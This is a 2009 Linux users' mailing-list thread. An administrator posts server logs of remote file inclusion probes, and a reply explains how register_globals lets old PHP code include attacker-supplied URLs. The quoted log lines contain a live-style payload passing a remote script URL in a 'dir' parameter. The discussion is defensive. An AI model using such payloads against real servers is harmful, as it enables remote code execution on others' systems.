[ale] Apache PHP redirect proxy type hack

Brandon Checketts brandon at brandonchecketts.com
Mon Jun 29 21:09:56 EDT 2009 

The request to webpage.php that returned a 200 status might or might not
be a problem.  You should examine the PHP script and see if it is doing
anything with the $dir variable without verifying that it is safe to use.

This type of vulnerability is common in old PHP code that relies on
register_globals being enabled.  When register_globals is enabled PHP
will automatically set global variables with those passed in the GET or
POST requests.  Poorly thought out PHP code will sometimes include()
that variable blindly and cause the page to be downloaded and executed.


Thanks,
Brandon Checketts




Ben Alexander wrote:
> Every now and then some IP address from Asia or other place hits our web
> server and is utilizing some PHP or mod_rewrite perhaps bug to proxy
> themselves to another website perhaps and use a lot of bandwidth, but
> only our outgoing it seems.
> 
> Here is an example from access_log of this (members.php is not a valid
> PHP page on the site):
> 
> 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET
> //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
> HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
> 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET
> /webpage.php//members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
> HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"
> 
> When this happens, there are hundreds of megs of log lines like this in
> error_log:
> 
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:
>  virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to
> include 'footer.php' - error finding URI in
> /htdocs/website.com/webpage.php <http://website.com/webpage.php> on line 93
> 
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request
> exceeded the limit of 10 subrequest nesting levels due to probable
> confguration error. Use 'LimitInternalRecursion' to increase the limit
> if necessary. Use 'LogLevel debug' to get a backtrace.
> 
> 
> Any idea how to prevent this?
> 
> Thanks,
> Ben
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://mail.ale.org/mailman/listinfo/ale

More information about the Ale mailing list